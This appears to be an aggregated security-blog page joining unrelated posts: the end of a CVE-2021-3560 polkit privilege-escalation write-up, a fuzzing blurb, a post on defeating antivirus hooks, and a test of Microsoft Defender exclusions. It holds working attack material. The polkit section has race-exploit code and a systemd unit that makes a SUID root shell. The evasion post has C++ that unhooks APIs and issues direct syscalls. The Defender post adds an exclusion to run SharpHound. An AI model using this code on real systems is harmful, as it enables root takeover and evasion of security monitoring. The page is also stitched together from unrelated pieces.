    threading.Thread(target=set_timezone).start()

Run the program:

dev@test:~$ python3 agent.py
[+] PolicyKit authentication agent registered successfully
[*] D-Bus message loop now running ...
[*] Received authentication request
[*] Action ID: org.freedesktop.timedate1.set-timezone
[*] Cookie: 3-31e1bb8396c301fad7e3a40706ed6422-1-0a3c2713a55294e172b441c1dfd1577d
[*] Method response: (DBusException(dbus.String('Permission denied')),)

Meanwhile, PolicyKit's output is:

** (polkitd:186082): DEBUG: 00:37:29.575: In authentication_agent_response for cookie '3-31e1bb8396c301fad7e3a40706ed6422-1-0a3c2713a55294e172b441c1dfd1577d' and identity unix-user:root
** (polkitd:186082): DEBUG: 00:37:29.576: OUT: Only uid 0 may invoke this method.
** (polkitd:186082): DEBUG: 00:37:29.576: Authentication complete, is_authenticated = 0
** (polkitd:186082): DEBUG: 00:37:29.577: In check_authorization_challenge_cb
  subject                system-bus-name::1.6846
  action_id              org.freedesktop.timedate1.set-timezone
  was_dismissed          0
  authentication_success 0

00:37:29.577: Operator of unix-process:186211:9138723 FAILED to authenticate to gain authorization for action org.freedesktop.timedate1.set-timezone for system-bus-name::1.6846 [python3 agent.py] (owned by unix-user:dev)

As you can see, our Authentication Agent is working properly and receives the BeginAuthentication call sent by PolicyKit. PolicyKit then reports "Only uid 0 may invoke this method", because our AuthenticationAgentResponse was sent by the dev user rather than root.

0x05. Trigger The Vulnerability

Next, let's try to trigger the vulnerability by terminating the process right after sending the request:

self._bus.send_message(message)
os.kill(os.getpid(), 9)

Invoke it several times and observe:

** (polkitd:186082): DEBUG: 01:09:17.375: In authentication_agent_response for cookie '51-20cf92ca04f0c6b029d0309dbfe699b5-1-3d3e63e4e98124979952a29a828057c7' and identity unix-user:root
** (polkitd:186082): DEBUG: 01:09:17.377: OUT: RET: 1
** (polkitd:186082): DEBUG: 01:09:17.377: Removing authentication agent for unix-process:189453:9329523 at name :1.6921, object path /org/freedesktop/PolicyKit1/AuthenticationAgent (disconnected from bus)
01:09:17.377: Unregistered Authentication Agent for unix-process:189453:9329523 (system bus name :1.6921, object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_US.UTF-8) (disconnected from bus)
** (polkitd:186082): DEBUG: 01:09:17.377: OUT: error
Error performing authentication: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message recipient disconnected from message bus without replying (g-dbus-error-quark 4)

(polkitd:186082): GLib-WARNING **: 01:09:17.379: GError set over the top of a previous GError or uninitialized memory.
This indicates a bug in someone's code. You must ensure an error is NULL before it's set.
The overwriting error message was: Failed to open file ?/proc/0/cmdline?: No such file or directory
Error opening `/proc/0/cmdline': GDBus.Error:org.freedesktop.DBus.Error.NameHasNoOwner: Could not get UID of name ':1.6921': no such name
** (polkitd:186082): DEBUG: 01:09:17.380: In check_authorization_challenge_cb
  subject                system-bus-name::1.6921
  action_id              org.freedesktop.timedate1.set-timezone
  was_dismissed          0
  authentication_success 0

As can be seen, polkit_backend_interactive_authority_authentication_agent_response returned TRUE, yet check_authorization_challenge_cb still reports the request as unauthorized. The "Error performing authentication" message leads us to the function authentication_agent_begin_cb:

static void
authentication_agent_begin_cb (GDBusProxy   *proxy,
                               GAsyncResult *res,
                               gpointer      user_data)
{
  error = NULL;
  result = g_dbus_proxy_call_finish (proxy, res, &error);
  if (result == NULL)
    {
      g_printerr ("Error performing authentication: %s (%s %d)\n",
                  error->message,
                  g_quark_to_string (error->domain),
                  error->code);
      if (error->domain == POLKIT_ERROR && error->code == POLKIT_ERROR_CANCELLED)
        was_dismissed = TRUE;
      g_error_free (error);
    }
  else
    {
      g_variant_unref (result);
      gained_authorization = session->is_authenticated;
      g_debug ("Authentication complete, is_authenticated = %d", session->is_authenticated);
    }

The logic is that is_authenticated is only set to TRUE when g_dbus_proxy_call_finish completes without an error. The documentation describes g_dbus_proxy_call_finish as follows:

Finishes an operation started with g_dbus_proxy_call().
You can then call g_dbus_proxy_call_finish() to get the result of the operation.

And at the same time the error message shows:

Message recipient disconnected from message bus without replying

To win the race, we first need to solve this problem. Observing both the normal and the failing cases with dbus-monitor, the successful case looks like this:

method call   sender=:1.3174 -> destination=:1.3301 serial=6371 member=BeginAuthentication
method call   sender=:1.3301 -> destination=:1.3174 serial=6    member=AuthenticationAgentResponse2 
method return sender=:1.3301 -> destination=:1.3174 serial=7 reply_serial=6371

The failing case looks like this:

method call sender=:1.3174 -> destination=:1.3301 serial=12514 member=BeginAuthentication 
method call sender=:1.3301 -> destination=:1.3174 serial=6     member=AuthenticationAgentResponse2 
error       sender=org.freedesktop.DBus -> destination=:1:3174 error_name=org.freedesktop.DBus.Error.NoReply

Here :1.3174 is PolicyKit and :1.3301 is the Authentication Agent. In the successful case, the Authentication Agent sends a method return message whose reply_serial refers to the BeginAuthentication call, indicating that the method completed successfully. In the failing case, the D-Bus daemon instead sends a NoReply error to PolicyKit.

0x06. The Time Window

From the analysis above we can derive the time window for triggering the vulnerability: terminate the process after sending the method return message, but before PolicyKit retrieves the caller of AuthenticationAgentResponse2. To control message sending precisely, we modify the Authentication Agent's code as follows:

    @dbus.service.method(
            dbus_interface="org.freedesktop.PolicyKit1.AuthenticationAgent",
            in_signature="sssa{ss}saa{sa{sv}}", message_keyword='_msg')
    def BeginAuthentication(self, action_id, message, icon_name, details,
                            cookie, identities, _msg):
        print('[*] Received authentication request')
        print('[*] Action ID: {}'.format(action_id))
        print('[*] Cookie: {}'.format(cookie))


        def send(msg):
            self._bus.send_message(msg)

        ret_message = dbus.lowlevel.MethodReturnMessage(_msg)
        message = dbus.lowlevel.MethodCallMessage('org.freedesktop.PolicyKit1',
                                                  '/org/freedesktop/PolicyKit1/Authority',
                                                  'org.freedesktop.PolicyKit1.Authority',
                                                  'AuthenticationAgentResponse2')
        message.append(dbus.types.UInt32(os.getuid()))
        message.append(cookie)
        message.append(identities[0])
        threading.Thread(target=send, args=(message, )).start()
        threading.Thread(target=send, args=(ret_message, )).start()
        os.kill(os.getpid(), 9)

Looking at PolicyKit's output, authentication now succeeds:

** (polkitd:192813): DEBUG: 01:42:29.925: In authentication_agent_response for cookie '3-7c19ac0c4623cf4548b91ef08584209f-1-22daebe24c317a3d64d74d2acd307468' and identity unix-user:root
** (polkitd:192813): DEBUG: 01:42:29.928: OUT: RET: 1
** (polkitd:192813): DEBUG: 01:42:29.928: Authentication complete, is_authenticated = 1

(polkitd:192813): GLib-WARNING **: 01:42:29.934: GError set over the top of a previous GError or uninitialized memory.
This indicates a bug in someone's code. You must ensure an error is NULL before it's set.
The overwriting error message was: Failed to open file ?/proc/0/cmdline?: No such file or directory
Error opening `/proc/0/cmdline': GDBus.Error:org.freedesktop.DBus.Error.NameHasNoOwner: Could not get UID of name ':1.7428': no such name
** (polkitd:192813): DEBUG: 01:42:29.934: In check_authorization_challenge_cb
  subject                system-bus-name::1.7428
  action_id              org.freedesktop.timedate1.set-timezone
  was_dismissed          0
  authentication_success 1

And the system timezone has indeed been changed.

0x07. Before The Exploit

Instead of the Accounts Daemon exploit given by the original author, I chose to use org.freedesktop.systemd1. First, it frees us from the restriction of needing a method annotated with org.freedesktop.policykit.imply; second, this D-Bus service exists on almost every Linux system; and finally, it exposes some high-risk methods.

$ gdbus introspect --system -d org.freedesktop.systemd1 -o /org/freedesktop/systemd1
...
  interface org.freedesktop.systemd1.Manager {
      ...
      StartUnit(in  s arg_0,
                in  s arg_1,
                out o arg_2);
      ...
      EnableUnitFiles(in  as arg_0,
                      in  b arg_1,
                      in  b arg_2,
                      out b arg_3,
                      out a(sss) arg_4);
      ...
  }
...

EnableUnitFiles accepts a list of systemd unit file paths and loads them into systemd; after that, calling Reload and then StartUnit allows arbitrary commands to be executed as root. The systemd unit file looks like this:

[Unit]
AllowIsolate=no

[Service]
ExecStart=/bin/bash -c 'cp /bin/bash /usr/local/bin/pwned; chmod +s /usr/local/bin/pwned'
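For completeness, the follow-up calls mentioned above would look roughly like the sketch below once authorization has been obtained (method names are from the org.freedesktop.systemd1.Manager interface; the unit name is a placeholder). Note that these calls are also guarded by PolicyKit, so in the real exploit they are issued while the racing Authentication Agent is active:

import dbus
from dbus.mainloop.glib import DBusGMainLoop

bus = dbus.SystemBus(mainloop=DBusGMainLoop())
obj = bus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
manager = dbus.Interface(obj, dbus_interface='org.freedesktop.systemd1.Manager')
manager.Reload()                                # make systemd re-read unit files
manager.StartUnit('pwned.service', 'replace')   # 'pwned.service' is a placeholder name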

The flow looks straightforward, but a problem shows up in practice. The problem lies with the EnableUnitFiles method; let's first write some code to call it:

def enable_unit_files():
    print('[*] Starting EnableUnitFiles ...')
    bus = dbus.SystemBus(mainloop=DBusGMainLoop())
    obj = bus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
    interface = dbus.Interface(obj, dbus_interface='org.freedesktop.systemd1.Manager')
    interface.EnableUnitFiles(['test'], True, True, reply_handler=handler, error_handler=handler)

Running it produces the following output:

dev@test:~$ python3 agent.py
[*] Starting EnableUnitFiles ...
[+] PolicyKit authentication agent registered successfully
[*] D-Bus message loop now running ...
[*] Method response: (DBusException(dbus.String('Interactive authentication required.')),)

Clearly the call never reaches the Authentication Agent we registered; instead it immediately returns the "Interactive authentication required." error. Analysing the actual code leads to the following logic:

static void
polkit_backend_interactive_authority_check_authorization (PolkitBackendAuthority         *authority,
                                                          PolkitSubject                  *caller,
                                                          PolkitSubject                  *subject,
                                                          const gchar                    *action_id,
                                                          PolkitDetails                  *details,
                                                          PolkitCheckAuthorizationFlags   flags,
                                                          GCancellable                   *cancellable,
                                                          GAsyncReadyCallback             callback,
                                                          gpointer                        user_data)
{
  // ...
  if (polkit_authorization_result_get_is_challenge (result) &&
      (flags & POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION))
    {
      AuthenticationAgent *agent;
      agent = get_authentication_agent_for_subject (interactive_authority, subject);
      if (agent != NULL)
        {
          g_object_unref (result);
          result = NULL;

          g_debug (" using authentication agent for challenge");
          authentication_agent_initiate_challenge (agent,
                                                   // ...
          goto out;
        }
    }

This code checks whether the POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION message flag is 0; if it is, the branch that uses the Authentication Agent is never taken. Consulting the documentation, I found that POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION is controlled by the message sender: the D-Bus library provides a corresponding setter, dbus_message_set_allow_interactive_authorization (https://dbus.freedesktop.org/doc/api/html/group__DBusMessage.html#gae734e7f4079375a0256d9e7f855ec4e4).

However, when I went through the dbus-python documentation, I found that it does not expose this method. So I patched dbus-python to add it; the fork is available at https://gitlab.freedesktop.org/RicterZ/dbus-python:

PyDoc_STRVAR(Message_set_allow_interactive_authorization__doc__,
"message.set_allow_interactive_authorization(bool) -> None\n"
"Set allow interactive authorization flag to this message.\n");
static PyObject *
Message_set_allow_interactive_authorization(Message *self, PyObject *args)
{
    int value;
    if (!PyArg_ParseTuple(args, "i", &value)) return NULL;
    if (!self->msg) return DBusPy_RaiseUnusableMessage();
    dbus_message_set_allow_interactive_authorization(self->msg, value ? TRUE : FALSE);
    Py_RETURN_NONE;
}

I have also submitted this change as a merge request and hope it will be merged upstream.

0x08. The Final Exploit

With set_allow_interactive_authorization added, we can build the message using the low-level interface provided by dbus-python:

def method_call_install_service():
    time.sleep(0.1)
    print('[*] Enable systemd unit file \'{}\' ...'.format(FILENAME))
    bus2 = dbus.SystemBus(mainloop=DBusGMainLoop())
    message = dbus.lowlevel.MethodCallMessage(NAME, OBJECT, IFACE, 'EnableUnitFiles')
    message.set_allow_interactive_authorization(True)
    message.set_no_reply(True)
    message.append(['/tmp/{}'.format(FILENAME)])
    message.append(True)
    message.append(True)
    bus2.send_message(message)

After setting the flag and sending the message, we now receive the BeginAuthentication request from PolicyKit. The overall framework should be clear by now, and writing a working exploit is not difficult. A screenshot of the final successful exploitation is shown below:

[Screenshot]

The Golang and C versions of the exploit code are as follows:

0x09. Conclusion

CVE-2021-3560 is a vulnerability whose impact has been underestimated. I believe this is because the original author was not particularly familiar with the inner workings of D-Bus and PolicyKit and therefore missed the Authentication Agent mechanism, ending up with a rather restrictive PoC. I certainly would not claim to be an expert in D-Bus and PolicyKit myself, but only after consulting a large amount of documentation and historical vulnerability analyses, and reading a lot of code during my recent vulnerability research, did I realize that the Authentication Agent could be used for exploitation.

At the same time, as a security researcher focused on web vulnerabilities, I naturally cast everything into web terms. D-Bus is very similar to the web: I met no particular resistance while hunting for privilege escalations, yet gained a great deal. I hope security practitioners will use D-Bus as an entry point into binary research, step out of their comfort zone, and broaden their horizons in vulnerability hunting (what, memory corruption bugs? Don't even think about it).

0x0a. Reference

Homemade Fuzzing Platform Recipe

By: Ylabs
26 August 2021 at 15:30
Reading Time: 5 minutes. It's no secret that, since the beginning of the year, I've spent a good amount of time learning how to fuzz different Windows software, triaging crashes, filling CVE forms, writing harnesses and custom tools to aid in the process. Today I would like to sneak peek into my high-level process of designing a Homemade Fuzzing Platform, […]

Defeating Antivirus Real-time Protection From The Inside

28 July 2016 at 05:01
Defeating Antivirus Real-time Protection From The Inside

Hello again! In this post I'd like to talk about the research I did some time ago on antivirus real-time protection mechanisms and how I found effective ways to evade them. This method may even work for evading analysis in sandbox environments, but I haven't tested that yet.

The specific AV I was testing this method with was BitDefender. It performs real-time protection for every process in user-mode and detects suspicious behaviour patterns by monitoring the calls to Windows API.

Without further ado, let's jump right to it.

What is Realtime Protection?

Detecting malware by signature matching is still used, but it is not very efficient. More and more malware uses polymorphism, metamorphism, encryption, or code obfuscation in order to make itself extremely hard to detect using the old detection methods. Most new-generation AV software implements behavioral detection analysis: it monitors every running process on the PC and looks for suspicious activity patterns that may indicate the computer has been infected with malware.

As an example, let's imagine a program that doesn't create any user interface (dialogs, windows, etc.) and, as soon as it starts, wants to connect to and download files from an external server in Romania. This kind of behaviour is extremely suspicious, and most AV software with real-time protection will stop such a process and flag it as dangerous even though it may have been seen for the first time.

Now you may ask: how does such protection work, and how does the AV know what the monitored process is doing? In the majority of cases, the AV injects its own code into the running process, which then performs Windows API hooking of the specific API functions that are of interest to the protection software. API hooking allows the AV to see exactly which function is called, when, and with what parameters. Cuckoo Sandbox, for example, does the same thing to generate its detailed report on how the running program interacts with the operating system.

Let's take a look at what the hook would look like for the CreateFileW API imported from the kernel32.dll library.

This is what the function code looks like in its original form:

76B73EFC > 8BFF                         MOV EDI,EDI
76B73EFE   55                           PUSH EBP
76B73EFF   8BEC                         MOV EBP,ESP
76B73F01   51                           PUSH ECX
76B73F02   51                           PUSH ECX
76B73F03   FF75 08                      PUSH DWORD PTR SS:[EBP+8]
76B73F06   8D45 F8                      LEA EAX,DWORD PTR SS:[EBP-8]
...
76B73F41   E8 35D7FFFF                  CALL <JMP.&API-MS-Win-Core-File-L1-1-0.C>
76B73F46   C9                           LEAVE
76B73F47   C2 1C00                      RETN 1C

Now if an AV were to hook this function, it would replace the first few bytes with a JMP instruction that redirects the execution flow to its own hook handler function. That way the AV registers the execution of this API together with all the parameters lying on the stack at that moment. After the AV hook handler finishes, it executes the original bytes that were replaced by the JMP instruction and jumps back into the API function so the process can continue its execution.

This is what the function code would look like with the injected JMP instruction:

Hook handler:
1D001000     < main hook handler code - logging and monitoring >
...
1D001020     8BFF                       MOV EDI,EDI              ; original code that was replaced with the JMP is executed
1D001022     55                         PUSH EBP
1D001023     8BEC                       MOV EBP,ESP
1D001025    -E9 D72EB759                JMP kernel32.76B73F01    ; jump back to CreateFileW to instruction right after the hook jump

CreateFileW:
76B73EFC >-E9 FFD048A6                  JMP handler.1D001000     ; jump to hook handler
76B73F01   51                           PUSH ECX                 ; execution returns here after hook handler has done its job
76B73F02   51                           PUSH ECX
76B73F03   FF75 08                      PUSH DWORD PTR SS:[EBP+8]
76B73F06   8D45 F8                      LEA EAX,DWORD PTR SS:[EBP-8]
...
76B73F46   C9                           LEAVE
76B73F47   C2 1C00                      RETN 1C

There are multiple ways of hooking code, but this one is the fastest and doesn't create much of a bottleneck in execution performance. Other hooking techniques involve injecting INT3 instructions, or setting up debug registers and handling them with your own exception handlers that later redirect execution to the hook handlers.

Now that you know how real-time protection works and how exactly it involves API hooking, I can proceed to explain the methods of bypassing it.

There are AV products on the market that perform real-time monitoring in kernel-mode (Ring0), but this is out of scope of this post and I will focus only on bypassing protections of AV products that perform monitoring in user-mode (Ring3).

The Unhooking Flashbang

As you know already, real-time protection relies entirely on its API hook handlers being executed. Only when the AV hook handler is executed can the protection software register the API call, monitor the parameters, and continue mapping the process activity.

It is obvious that in order to completely disable the protection, we need to remove the API hooks; as a result, the protection software becomes blind to everything we do.

In our own application, we control the whole process memory space. AV, with its injected code, is just an intruder trying to tamper with our software's functionality, but we are the king of our land.

Steps to take should be as follows:

  1. Enumerate all loaded DLL libraries in current process.
  2. Find entry-point address of every imported API function of each DLL library.
  3. Remove the injected hook JMP instruction by replacing it with the API's original bytes.

It all seems fairly simple until it comes to restoring the API function's original code from before the hook JMP was injected. Getting the original bytes from the hook handlers is out of the question, as there is no way to find out which part of the handler's code is the original API function prologue. So, how do we find the original bytes?

The answer is: Manually retrieve them by reading the respective DLL library file stored on disk. The DLL files contain all the original code.

In order to find the original first 16 bytes (which is more than enough) of CreateFileW API, the process is as follows:

  1. Read the contents of kernel32.dll file from Windows system folder into memory. I will call this module raw_module.
  2. Get the base address of the imported kernel32.dll module in our current process. I will call the imported module imported_module.
  3. Fix the relocations of the manually loaded raw_module with base address of imported_module (retrieved in step 2). This will make all fixed address memory references look the same as they would in the current imported_module (complying with ASLR).
  4. Parse the raw_module export table and find the address of CreateFileW API.
  5. Copy the original 16 bytes from the found exported API address to the address of the currently imported API where the JMP hook resides.

This will effectively overwrite the current JMP with the original bytes of any API.
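
As a rough illustration, the following C++ sketch restores the first 16 bytes of a single API from a clean on-disk copy of its DLL. Instead of manually fixing relocations as described in the steps above, it maps the file with SEC_IMAGE (which lays the sections out the way the loader would) and assumes the copied prologue bytes contain no absolute address references, which holds for typical API prologues; forwarded exports and the API Set Schema indirection mentioned below are ignored for brevity.

// unhook_sketch.cpp - restore the original prologue of one API from a clean
// on-disk copy of its DLL. Error handling is stripped for brevity.
#include <windows.h>
#include <cstdio>
#include <cstring>

// Walk the export table of a mapped image and return the address of a named export.
void* FindExport(BYTE* base, const char* name) {
    auto dos   = (PIMAGE_DOS_HEADER)base;
    auto nt    = (PIMAGE_NT_HEADERS)(base + dos->e_lfanew);
    auto dir   = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    auto exp   = (PIMAGE_EXPORT_DIRECTORY)(base + dir.VirtualAddress);
    auto names = (DWORD*)(base + exp->AddressOfNames);
    auto ords  = (WORD*)(base + exp->AddressOfNameOrdinals);
    auto funcs = (DWORD*)(base + exp->AddressOfFunctions);
    for (DWORD i = 0; i < exp->NumberOfNames; i++)
        if (strcmp((char*)(base + names[i]), name) == 0)
            return base + funcs[ords[i]];
    return nullptr;
}

int main() {
    const char* dllPath = "C:\\Windows\\System32\\kernel32.dll";
    const char* apiName = "CreateFileW";

    // 1. Map a clean copy of the DLL from disk. SEC_IMAGE lays the sections
    //    out as the loader would, without running DllMain or applying hooks.
    HANDLE file    = CreateFileA(dllPath, GENERIC_READ, FILE_SHARE_READ, nullptr,
                                 OPEN_EXISTING, 0, nullptr);
    HANDLE mapping = CreateFileMappingA(file, nullptr, PAGE_READONLY | SEC_IMAGE, 0, 0, nullptr);
    BYTE*  clean   = (BYTE*)MapViewOfFile(mapping, FILE_MAP_READ, 0, 0, 0);

    // 2. Locate the export in both the clean mapping and the loaded (possibly hooked) module.
    BYTE* cleanApi  = (BYTE*)FindExport(clean, apiName);
    BYTE* hookedApi = (BYTE*)GetProcAddress(GetModuleHandleA("kernel32.dll"), apiName);

    // 3. Copy the original first 16 bytes over the live API, removing any JMP hook.
    DWORD old;
    VirtualProtect(hookedApi, 16, PAGE_EXECUTE_READWRITE, &old);
    memcpy(hookedApi, cleanApi, 16);
    VirtualProtect(hookedApi, 16, old, &old);

    printf("Restored the first 16 bytes of %s from %s\n", apiName, dllPath);
    UnmapViewOfFile(clean);
    CloseHandle(mapping);
    CloseHandle(file);
    return 0;
}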

If you want to read more on parsing Portable Executable files, the best tutorial was written by Iczelion (the website has a great 90's feel too!). Among many subjects, you can learn about parsing the import table and export table of PE files.

When parsing the import table, you need to keep in mind that Microsoft, with release of Windows 7, introduced a strange creature called API Set Schema. It is very important to properly parse the imports pointing to these DLLs. There is a very good explanation of this entity by Geoff Chappel in his The API Set Schema article.

Stealth Calling

The API unhooking method may fool most of the AV products that perform their behavioral analysis in user-mode. However, it is not enough to fool automated sandbox analysis tools like Cuckoo Sandbox. Cuckoo is apparently able to detect whether the API hooks it put in place were removed. That makes the previous method ineffective in the long run.

I thought of another method to bypass AV/sandbox monitoring. I am positive it would work, even though I have yet to put it into practice. There is surely already malware out there implementing this technique.

First of all, I must mention that ntdll.dll library serves as the direct passage between user-mode and kernel-mode. Its exported APIs directly communicate with Windows kernel by using syscalls. Most of the other Windows libraries eventually call APIs from ntdll.dll.

Let's take a look at the code of ZwCreateFile API from ntdll.dll on Windows 7 in WOW64 mode:

77D200F4 > B8 52000000                  MOV EAX,52
77D200F9   33C9                         XOR ECX,ECX
77D200FB   8D5424 04                    LEA EDX,DWORD PTR SS:[ESP+4]
77D200FF   64:FF15 C0000000             CALL DWORD PTR FS:[C0]
77D20106   83C4 04                      ADD ESP,4
77D20109   C2 2C00                      RETN 2C

Basically, it passes EAX = 0x52, with a pointer to the stack arguments in EDX, to the function stored in the TIB at offset 0xC0. That call switches the CPU mode from 32-bit to 64-bit and executes the NtCreateFile syscall in Ring0. 0x52 is the syscall number for NtCreateFile on my Windows 7 system, but syscall numbers differ between Windows versions and even between Service Packs, so it is never a good idea to rely on these numbers. You can find more information about syscalls on Simone Margaritelli's blog here.

Most protection software will hook ntdll.dll APIs, as that is the lowest level you can get to, right in front of the kernel's doorstep. For example, if you only hook CreateFileW in kernel32.dll, which eventually calls ZwCreateFile in ntdll.dll, you will never catch direct calls to ZwCreateFile. A hook in the ZwCreateFile API, on the other hand, will be triggered every time CreateFileW or CreateFileA is called, as they both eventually call the lowest level API that communicates directly with the kernel.

There is always exactly one loaded instance of any imported DLL module. That means that if an AV or sandbox solution wants to hook the API of a chosen DLL, it will find that module in the current process' loaded modules list. Following the DLL module's export table, it will find and hook the exported API function of interest.

Now, to the interesting part. What if we copied the code snippet I pasted above from ntdll.dll and implemented it in our own application's code? It would be an identical copy of the ntdll.dll code, executing the 0x52 syscall from within our own code section. No user-mode protection software would ever find out about it.
It is an ideal method of bypassing any API hooks without actually detecting and unhooking them!

The thing is, as I mentioned before, we cannot trust the syscall numbers, as they differ between Windows versions. What we can do, though, is read the whole ntdll.dll library file from disk and manually map it into the current process' address space. That way we will be able to execute code that was prepared exclusively for our version of Windows, while having an exact copy of ntdll.dll outside of the AV's reach.
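
Here is a minimal C++ sketch of the idea on x64. For brevity it recovers the syscall number from the stub of the currently loaded ntdll.dll (in a real bypass you would take it from the clean on-disk copy, exactly because the loaded one may already be hooked), and it uses NtClose only because its signature is short:

// direct_syscall_sketch.cpp - execute a syscall from our own code section (x64).
#include <windows.h>
#include <winternl.h>
#include <cstdio>
#include <cstring>

typedef NTSTATUS(NTAPI* NtClose_t)(HANDLE Handle);

// Recover the syscall number from an ntdll stub:
//   4C 8B D1        mov r10, rcx
//   B8 xx xx xx xx  mov eax, <syscall number>
DWORD GetSyscallNumber(const char* exportName) {
    BYTE* p = (BYTE*)GetProcAddress(GetModuleHandleA("ntdll.dll"), exportName);
    if (!p || p[3] != 0xB8) return (DWORD)-1;   // stub not in the expected form (hooked?)
    DWORD number;
    memcpy(&number, p + 4, sizeof(number));
    return number;
}

int main() {
    DWORD number = GetSyscallNumber("NtClose");
    if (number == (DWORD)-1) { puts("could not recover syscall number"); return 1; }

    // Our own copy of the stub: mov r10, rcx ; mov eax, imm32 ; syscall ; ret
    BYTE stub[] = { 0x4C, 0x8B, 0xD1, 0xB8, 0, 0, 0, 0, 0x0F, 0x05, 0xC3 };
    memcpy(stub + 4, &number, sizeof(number));

    void* mem = VirtualAlloc(nullptr, sizeof(stub), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memcpy(mem, stub, sizeof(stub));
    DWORD old;
    VirtualProtect(mem, sizeof(stub), PAGE_EXECUTE_READ, &old);

    // The call below never touches ntdll code, so user-mode hooks never see it.
    NtClose_t MyNtClose = (NtClose_t)mem;
    HANDLE h = CreateEventA(nullptr, FALSE, FALSE, nullptr);
    NTSTATUS status = MyNtClose(h);
    printf("NtClose via direct syscall returned 0x%08lX\n", (unsigned long)status);
    return 0;
}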

I mentioned ntdll.dll for now because this DLL doesn't have any dependencies. That means it doesn't have to load any other DLLs or call their APIs. Every one of its exported functions passes execution directly to the kernel and not to other user-mode DLLs. That shouldn't stop you from manually importing any other DLL (like kernel32.dll or user32.dll) the same way, as long as you walk through the DLL's import table and populate it manually, recursively importing all of the library's dependencies.
That way the manually mapped modules will use only other manually mapped dependencies and will never have to touch the modules that were loaded into the address space when the program started.

Afterwards, it is only a matter of calling the API functions from your manually mapped DLL files in memory and you can be sure that no AV or sandbox software will ever be able to detect such calls or hook them in user-mode.

Conclusion

There is certainly nothing that user-mode AV or sandbox software can do about the evasion methods I described above, other than going deeper into Ring0 and monitoring the process activity from the kernel.

The unhooking method can be countered by the protection software re-hooking the API functions, but then the APIs can be unhooked again, and the cat and mouse game never ends. In my opinion the stealth calling method is much more professional, as it is completely unintrusive, but it is a bit harder to implement. I may spend some time on an implementation that I will test against all the popular sandbox analysis software and publish the results.

As always, I'm happy to hear your feedback or ideas.

You can hit me up on Twitter @mrgretzky or send an email to [email protected].

Enjoy and see you next time!

Can we block the addition of local Microsoft Defender Antivirus exclusions?

2 December 2022 at 09:00

Introduction

A few weeks ago, I got a question from a client about how they could prevent administrators, including local administrators on a device, from adding exclusions in Microsoft Defender Antivirus. I first thought it was going to be pretty easy by pushing some settings via Microsoft Endpoint Manager. However, after doing some research and tests in a lab environment, I discovered that it might not be as easy as I thought.

What capabilities in Microsoft Defender Antivirus can help us?

Microsoft Defender Antivirus, which is part of the Microsoft Defender for Endpoint (MDE), is one component of the next-generation protection solution. Microsoft Defender Antivirus comes with different features that can be configured using Microsoft Endpoint Manager (MEM)/Intune, Group Policy, PowerShell, etc. These features include cloud-delivered and real-time protection with behavioral, heuristic and machine learning-based protection.

Because some business applications might be blocked by these capabilities, there is the possibility to create specific exclusions for files, processes and process-opened files from Microsoft Defender Antivirus scans, real-time protection and monitoring. Although exclusions can be useful to benefit from the protection capabilities while preventing any impact on end users and business flows, they represent a protection gap. Indeed, the more exclusions there are, the larger the attack surface is. Therefore, it is a best practice to keep them as limited as possible and to review them periodically.

Because these are protection gaps, you don't want users adding exclusions locally on their laptops. By default, standard users can't change, add or remove exclusions. However, administrators can. This is where our problems start. Indeed, we want to prevent users from helping themselves by installing suspicious software, and we don't want attackers who have gained sufficient privileges to add exclusions so that they can install and run their malicious payloads.

How can we prevent users from adding exclusions? We can, right? We will go over the different possibilities in Microsoft Defender for Endpoint to do so.

Tamper Protection

First, let’s have a look at Tamper Protection. By searching on the Internet, I found a few posts mentioning that Tamper Protection could help us to solve this issue.

Tamper Protection is a feature that, as its name suggests, protects specific security settings against tampering. The main objective of Tamper Protection is to make sure attackers can't disable security features to get easier access to your data, install malware or run exploits. In practice, Tamper Protection prevents the following:

  • Disabling virus and threat protection
  • Disabling real-time protection
  • Turning off behavior monitoring
  • Disabling antivirus protection, such as IOfficeAntivirus (IOAV)
  • Disabling cloud-delivered protection
  • Removing security intelligence updates
  • Disabling automatic actions on detected threats
  • Suppressing notifications in the Windows Security app
  • Disabling scanning of archives and network files

Therefore, we can already see that this is not going to help us here. I can also confirm this based on the tests that I have done. During the tests, Tamper Protection is enabled at the tenant level in the Microsoft 365 Defender portal and therefore applied to all devices by default.

Local Admin Merge

Secondly, we have the Defender “local admin merge” feature. This capability looks more interesting. Indeed, it allows you to control whether exclusion list settings configured by a local admin are merged with the managed settings from an Intune policy. We can use a Microsoft Defender Antivirus profile in Microsoft Endpoint Manager to configure it:

Enforce "Disable Local Admin Merge" in an Antivirus profile in MEM
Enforce “Disable Local Admin Merge” in an Antivirus profile in MEM

Three values are supported for the Disable Local Admin Merge:

  • Not configured: preference settings configured by local administrators will be merged into the resulting effective policy. If there are conflicts, settings from Intune will override local preference settings.
  • Enable Local Admin Merge: same as Not configured.
  • Disable Local Admin Merge: Intune-managed settings override preference settings that are configured by local administrators.

Theoretically, the Disable Local Admin Merge value would allow us to prevent local admins from creating exclusions. We will test that in a moment, but let's first check that this setting is correctly applied on my device. In the Registry Editor, I verify that the DisableLocalAdminMerge key is set to 1:

DisableLocalAdminMerge key set to 1 (enforced)

It seems to be the case here, great! If we go to Windows Security on the local machine, we can see that exclusions already exist and that we can't add or manage them. This is because these policies have been pushed through Intune:

Existing exclusions configured via Intune

We will now see if we can still add local exclusions to download and run malicious software. First, if we try to download SharpHound for example, it will end up in the user’s download folder and get removed automatically:

Windows Security alert: Threat found

As mentioned before, exclusions can be managed in PowerShell. We will add an exclusion for our Downloads folder using the Add-MpPreference -ExclusionPath 'C:\Users\<USERNAME>\Downloads' PowerShell cmdlet (make sure to replace <USERNAME>). Moreover, we can verify the exclusions that currently apply using Get-MpPreference, as shown below:

Current exclusions in Microsoft Defender Antivirus

It looks like our exclusion has been successfully added (see ExclusionPath). Once added, SharpHound can be downloaded and is not removed by Microsoft Defender Antivirus. Additionally, if we bypass the Windows antimalware warning, it can be executed (my machine is not joined to any domain hence the error in SharpHound):

Run SharpHound

